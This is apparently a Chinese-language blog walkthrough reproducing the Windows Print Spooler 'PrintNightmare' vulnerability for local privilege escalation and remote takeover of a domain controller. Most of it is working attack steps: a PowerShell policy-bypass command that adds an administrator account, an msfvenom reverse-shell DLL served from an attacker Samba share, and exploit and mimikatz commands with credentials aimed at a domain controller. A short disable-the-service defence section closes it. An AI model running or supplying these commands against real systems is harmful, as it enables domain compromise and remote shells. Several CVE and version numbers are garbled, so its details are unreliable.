目录
漏洞概述漏洞复现一、PowerShell脚本实现本地提权二、Windows Print Spooler RCE域控MSF上线Cobalt Strike上线三、mimikatz武器化攻击漏洞防御参考链接漏洞概述
Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。
影响版本
Windows Server R2 (Server Core installation)
Windows Server R2
Windows Server (Server Core installation)
Windows Server
Windows Server R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server R2 for x64-based Systems Service Pack 1
Windows Server for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server for x64-based Systems Service Pack 2
Windows Server for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server (Server Core installation)
Windows Server
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version (Server Core installation)
Windows 10 Version for x64-based Systems
Windows 10 Version for ARM64-based Systems
Windows 10 Version for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server (Server Core installation)
Windows Server
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
漏洞复现
一、PowerShell脚本实现本地提权
1、确保Windows Print Spooler服务启用
运行输入“services.msc”打开服务,启用Print Spooler服务。
Exp
/calebstewart/CVE--1675
2、powershell绕过安全策略执行
本机实验环境为windows 10 1909专业版
powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘C:\Users\xxx\CVE-20 21-1675.ps1’); Invoke-Nightmare -DriverName “mac” -NewUser “hack” -NewPassword “hack123!”
已经添加到管理员组中
二、Windows Print Spooler RCE域控
1、域控环境为Windows server R2,域成员环境为window 7
2、此时已经拿到一个普通域成员用户,利用该漏洞去攻击域控服务器。
3、在攻击端设置好samba服务
[global]workgroup = workgroupserver string = testnetbios name = MZsecurity = usermap to guest = Bad Usersmb ports = 445log file = /var/log/samba/log.%mmax log size = 5[smb]comment = Sambabrowseable = yeswriteable = yespublic = yespath = /tmp/read only = noguest ok = yes
MSF上线
生成dll文件,放到共享目录tmp下
msfvenom -p windows/x64/shell_reverse_tcp lhost=ip lport=4444 -f dll -o payload.dll
设置监听
Windows server 貌似不行报Error: code: 0x5 - rpc_s_access_denied 错误,因为只能上传恶意dll文件,不能执行。
尝试Windows server
Windows server 开启samba服务问题
/developer/article/1528657
实验前关闭防火墙或者杀毒软件,方便实验
执行设置exp参数
CVE--1675.py /testuser:123456Abc@192.168.1.10 '\\192.168.1.40\smb\payload.dll'AD域名/普通域用户:用户密码@域控地址 ‘恶意dll文件共享地址’
Cobalt Strike上线
三、mimikatz武器化攻击
运行mimikatz,输入以下命令
misc::printnightmare /library:\\192.168.1.40\smb\payload.dll /server:192.168.1.10 /authuser:testuser /authdomain: /authpassword:123456Abc
这里就很奇怪他报错还能弹shell
在CS上线上就不报错。。。
漏洞防御
/update-guide/en-US/vulnerability/CVE--1675
禁用samba服务于Print Spooler服务
运行中输入”services.msc”选择print spooler服务禁用。
参考链接
GitHub - cube0x0/CVE--1675: C# and Impacket implementation of CVE--1675/PrintNightmare
CVE--1675 Windows Spooler Service RCE ()
GitHub - calebstewart/CVE--1675: Pure PowerShell implementation of CVE--1675 Print Spooler Local Privilege Escalation (PrintNightmare)
/gentilkiwi/mimikatz